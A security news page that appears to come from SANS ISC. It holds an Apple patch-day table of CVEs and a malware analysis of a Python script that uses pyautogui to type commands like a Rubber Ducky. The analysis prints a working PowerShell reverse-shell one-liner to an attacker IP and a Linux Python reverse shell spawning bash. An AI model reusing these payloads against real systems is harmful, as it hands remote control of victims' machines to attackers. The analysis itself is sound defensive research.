Apple Patches Everything Day

Published: 2022-07-20. Last Updated: 2022-07-20 18:37:20 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Apple today released its usual "surprise patch day" in updating all of its operating systems. There may still be specific Safari updates, but for currently supported operating systems, the operating system upgrades should include respective Safari/WebKit fixes.

Note that Apple does not "rank" vulnerabilities or provide CVSS scores (or many details at all). The rating below is our own simple rating.

None of the vulnerabilities appears to be actively exploited. 

 

Catalina BigSur Monterey tvOS iOS/iPadOS watchOS
CVE-2022-32832 [important] APFS
The issue was addressed with improved memory handling.
An app with root privileges may be able to execute arbitrary code with kernel privileges
x x x x x x
CVE-2022-32788 [critical] AppleAVD
A buffer overflow was addressed with improved bounds checking.
A remote user may be able to cause kernel code execution
      x x x
CVE-2022-32824 [important] AppleAVD
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory
      x x x
CVE-2022-32826 [important] AppleMobileFileIntegrity
An authorization issue was addressed with improved state management.
An app may be able to gain root privileges
x x x x x x
CVE-2022-32845 [important] Apple Neural Engine
This issue was addressed with improved checks.
An app may be able to break out of its sandbox
    x   x x
CVE-2022-32840 [important] Apple Neural Engine
This issue was addressed with improved checks.
An app may be able to execute arbitrary code with kernel privileges
    x   x x
CVE-2022-32810 [important] Apple Neural Engine
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges
    x   x x
CVE-2022-32820 [important] Audio
An out-of-bounds write issue was addressed with improved input validation.
An app may be able to execute arbitrary code with kernel privileges
x x x x x x
CVE-2022-32825 [important] Audio
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory
  x x x x x
CVE-2022-32839 [critical] CoreText
The issue was addressed with improved bounds checks.
A remote user may cause an unexpected app termination or arbitrary code execution
x x x x x x
CVE-2022-32819 [important] File System Events
A logic issue was addressed with improved state management.
An app may be able to gain root privileges
x x x x x x
CVE-2022-32793 [important] GPU Drivers
Multiple out-of-bounds write issues were addressed with improved bounds checking.
An app may be able to disclose kernel memory
    x x x x
CVE-2022-32821 [important] GPU Drivers
A memory corruption issue was addressed with improved validation.
An app may be able to execute arbitrary code with kernel privileges
    x x x x
CVE-2022-32787 [critical] ICU
An out-of-bounds write issue was addressed with improved bounds checking.
Processing maliciously crafted web content may lead to arbitrary code execution
x x x x x x
CVE-2022-32841 [important] ImageIO
The issue was addressed with improved memory handling.
Processing a maliciously crafted image may result in disclosure of process memory
    x x x x
CVE-2022-32813 [important] Kernel
The issue was addressed with improved memory handling.
An app with root privileges may be able to execute arbitrary code with kernel privileges
x x x x x x
CVE-2022-32815 [important] Kernel
The issue was addressed with improved memory handling.
An app with root privileges may be able to execute arbitrary code with kernel privileges
x x x x x x
CVE-2022-32817 [important] Kernel
An out-of-bounds read issue was addressed with improved bounds checking.
An app may be able to disclose kernel memory
    x x x x
CVE-2022-32844 [important] Kernel
A race condition was addressed with improved state handling.
An app with arbitrary kernel read and write capability may be able to bypass Pointer Authentication
      x x x
CVE-2022-26981 [important] Liblouis
This issue was addressed with improved checks.
An app may cause unexpected app termination or arbitrary code execution
    x x x x
CVE-2022-32823 [important] libxml2
A memory initialization issue was addressed with improved memory handling.
An app may be able to leak sensitive user information
x x x x x x
CVE-2022-32814 [important] Multi-Touch
A type confusion issue was addressed with improved state handling.
An app may be able to execute arbitrary code with kernel privileges
    x x x x
CVE-2022-32857 [important] Software Update
This issue was addressed by using HTTPS when sending information over the network.
A user in a privileged network position can track a user?s activity
x x x x x x
WebKit Bugzilla [critical] WebRTC
A memory corruption issue was addressed with improved state management.
Processing maliciously crafted web content may lead to arbitrary code execution
    x x x x
CVE-2022-32847 [other] Wi-Fi
This issue was addressed with improved checks.
A remote user may be able to cause unexpected system termination or corrupt kernel memory
x x x x x x
CVE-2022-32797 [other] AppleScript
This issue was addressed with improved checks.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
x x x      
CVE-2022-32853 [other] AppleScript
An out-of-bounds read issue was addressed with improved input validation.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
x x x      
CVE-2022-32851 [other] AppleScript
An out-of-bounds read issue was addressed with improved input validation.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
x x x      
CVE-2022-32831 [other] AppleScript
An out-of-bounds read issue was addressed with improved bounds checking.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
x x x      
CVE-2022-32805 [other] Calendar
The issue was addressed with improved handling of caches.
x x x      
CVE-2022-32849 [other] iCloud Photo Library
An information disclosure issue was addressed by removing the vulnerable code.
x x x x x  
CVE-2022-32781 [other] FaceTime
This issue was addressed by enabling hardened runtime.
An app with root privileges may be able to access private information
x x        
CVE-2022-32785 [other] ImageIO
A null pointer dereference was addressed with improved validation.
Processing an image may lead to a denial-of-service
x x x   x  
CVE-2022-32812 [important] Intel Graphics Driver
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges
x x x      
CVE-2022-32811 [important] Intel Graphics Driver
A memory corruption vulnerability was addressed with improved locking.
An app may be able to execute arbitrary code with kernel privileges
x x x      
CVE-2022-32786 [other] PackageKit

An app may be able to modify protected parts of the file system
x x x      
CVE-2022-32800 [other] PackageKit
This issue was addressed with improved checks.
An app may be able to modify protected parts of the file system
x x x      
CVE-2022-32838 [other] PluginKit
A logic issue was addressed with improved state management.
An app may be able to read arbitrary files
x x x   x  
CVE-2022-32843 [other] PS Normalizer
An out-of-bounds write issue was addressed with improved bounds checking.
Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory
x x x      
CVE-2022-32842 [important] SMB
An out-of-bounds read issue was addressed with improved input validation.
An app may be able to gain elevated privileges
x   x      
CVE-2022-32799 [other] SMB
An out-of-bounds read issue was addressed with improved bounds checking.
A user in a privileged network position may be able to leak sensitive information
x   x      
CVE-2022-32807 [other] Spindump
This issue was addressed with improved file handling.
An app may be able to overwrite arbitrary files
x x x      
CVE-2022-26704 [important] Spotlight

An app may be able to gain elevated privileges
x x        
CVE-2022-32834 [other] TCC
An access issue was addressed with improvements to the sandbox.
x x x      
CVE-2021-4136 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
x          
CVE-2021-4166 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
x          
CVE-2021-4173 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
x          
CVE-2021-4187 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
x          
CVE-2021-4192 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
x          
CVE-2021-4193 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
x          
CVE-2021-46059 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
x          
CVE-2022-0128 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
x          
CVE-2022-0156 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
  x        
CVE-2022-0158 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
  x        
CVE-2022-32848 [other] Windows Server
A logic issue was addressed with improved checks.
An app may be able to capture a user?s screen
  x x      
CVE-2022-32852 [other] AppleScript
An out-of-bounds read issue was addressed with improved input validation.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
    x      
CVE-2022-32789 [other] Automation
A logic issue was addressed with improved checks.
An app may be able to bypass Privacy preferences
    x      
CVE-2022-32828 [important] CoreMedia
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory
    x x x  
CVE-2022-32829 [important] Apple Neural Engine
This issue was addressed with improved checks.
An app may be able to execute arbitrary code with kernel privileges
    x   x  
CVE-2022-32796 [important] SMB
A memory corruption issue was addressed with improved state management.
An app may be able to execute arbitrary code with kernel privileges
    x      
CVE-2022-32798 [important] SMB
An out-of-bounds write issue was addressed with improved input validation.
An app may be able to gain elevated privileges
    x      
CVE-2022-32818 [important] SMB
The issue was addressed with improved memory handling.
An app may be able to leak sensitive kernel state
    x      
CVE-2022-32801 [important] Spotlight
This issue was addressed with improved checks.
An app may be able to gain root privileges
    x      
CVE-2021-28544 [other] subversion
Multiple issues were addressed by updating subversion.
Multiple issues in subversion
    x      
CVE-2022-24070 [other] subversion
Multiple issues were addressed by updating subversion.
Multiple issues in subversion
    x      
CVE-2022-29046 [other] subversion
Multiple issues were addressed by updating subversion.
Multiple issues in subversion
    x      
CVE-2022-29048 [other] subversion
Multiple issues were addressed by updating subversion.
Multiple issues in subversion
    x      
CVE-2022-32837 [important] Wi-Fi
This issue was addressed with improved checks.
An app may be able to cause unexpected system termination or write kernel memory
    x x x  
CVE-2022-32802 [critical] ImageIO
A logic issue was addressed with improved checks.
Processing a maliciously crafted file may lead to arbitrary code execution
      x x  
CVE-2022-32830 [important] ImageIO
An out-of-bounds read issue was addressed with improved bounds checking.
Processing a maliciously crafted image may lead to disclosure of user information
      x x  
CVE-2022-32855 [important] Home
A logic issue was addressed with improved state management.
A user may be able to view restricted content from the lock screen
        x  
CVE-2022-26768 [important] IOMobileFrameBuffer
A memory corruption issue was addressed with improved state management.
An application may be able to execute arbitrary code with kernel privileges
        x  
CVE-2022-32784 [important] Safari Extensions
The issue was addressed with improved UI handling.
Visiting a maliciously crafted website may leak sensitive data
        x  

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 comment(s)

Malicious Python Script Behaving Like a Rubber Ducky

Published: 2022-07-20. Last Updated: 2022-07-20 13:36:18 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Last week, it was SANSFIRE in Washington where I presented a SANS@Night talk about malicious Python scripts in Windows environment. I’m still looking for more fresh meat and, yesterday, I found another interesting one.

Do you remember the Rubber Ducky[1]? Pentesters like this kind of gadgets. I still have one as well as others with WiFi capabilities The idea behind these USB keys is to deliver a payload by simulating a keyboard. When you connect then to a computer, they are detected as a HID (“Human Interface Device”). The payload will be “injected” like if the user pressed all the keys one by one.

The script that I found provides the same behaviour! It was found on VT with a very low score of only 3/58[2] (SHA256:83d009773ecfbc4016493f131ea07aa57408c9a6d334dd66cac5dac81a745241). The magic happens with the help of a specific Python library called pyautogui[3]. The description says everything:

"PyAutoGUI lets your Python scripts control the mouse and keyboard to automate interactions with other applications. The API is designed to be simple. PyAutoGUI works on Windows, macOS, and Linux, and runs on Python 2 and 3."

How does it work? The script will open a “Run Command” windows (by simulating a “Win+R” keypress), launch a cmd.exe and type a Powershell onliner that will open a backdoor to a server controlled by the attacker:

import pyautogui
...
try:

    # abrir una terminal y conectar a la consola
    command = """powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('20[.]127[.]79[.]213', 6665);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" """

    pyautogui.hotkey('win', 'r')
    pyautogui.typewrite('cmd')
    pyautogui.press('enter')
    pyautogui.typewrite(command)
    pyautogui.press('enter')
except:
    pass

Note the Spanish comment!

Once the backdoor is open, the script implements a keylogger.

Finally, the script is compatible with Linux systems too. In this case, it does not use pyautogui but just implement a backdoor with bash:

if OS == 'Linux':
    self.socket.connect((self.host, self.port))
    os.dup2(self.socket.fileno(), 0)
    os.dup2(self.socket.fileno(), 1)
    os.dup2(self.socket.fileno(), 2)
    pty.spawn('/bin/bash')

The script remains basic and is not obfuscated but, but it does the job! 

[1] https://shop.hak5.org/products/usb-rubber-ducky-deluxe
[2] https://www.virustotal.com/gui/file/83d009773ecfbc4016493f131ea07aa57408c9a6d334dd66cac5dac81a745241/content/preview
[3] https://pyautogui.readthedocs.io/en/latest/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Wednesday, July 20th, 2022 https://isc.sans.edu/podcastdetail.html?id=8094

Comments


Diary Archives